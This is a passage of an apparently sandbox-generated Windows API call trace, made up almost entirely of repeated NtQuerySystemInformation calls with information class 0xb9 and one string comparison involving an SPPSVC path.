(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.247] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd6b0, Length=0x50, ResultLength=0x0) [0207.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.248] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.249] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd090, Length=0x50, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.251] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0207.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x50, ResultLength=0x0) [0207.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.252] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0207.265] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcce0, Length=0x28, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd50, Length=0x28, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.266] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0207.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.267] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcdd0, Length=0x28, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcc70, Length=0x20, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.269] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcbf0, Length=0x20, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfceb0, Length=0x38, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcd30, Length=0x20, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.270] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfccc0, Length=0x20, ResultLength=0x0) [0207.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.271] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x50, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x50, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x50, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x50, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x50, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x50, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x50, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.272] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfa0, Length=0x28, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.276] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0207.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.277] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0207.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.278] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x50, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x50, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2e0, Length=0x50, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x50, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x50, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x50, ResultLength=0x0) [0207.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1d0, Length=0x50, ResultLength=0x0) [0207.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0207.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf30, Length=0x28, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfa0, Length=0x28, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0207.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd020, Length=0x28, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf00, Length=0x20, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x38, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf80, Length=0x20, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf10, Length=0x20, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd390, Length=0x50, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd310, Length=0x28, ResultLength=0x0) [0207.297] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd390, Length=0x50, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd390, Length=0x50, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd390, Length=0x50, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x38, ResultLength=0x0) [0207.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x28, ResultLength=0x0) [0207.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x28, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0f0, Length=0x28, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd160, Length=0x28, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x38, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0207.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1e0, Length=0x28, ResultLength=0x0) [0207.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x38, ResultLength=0x0) [0207.305] 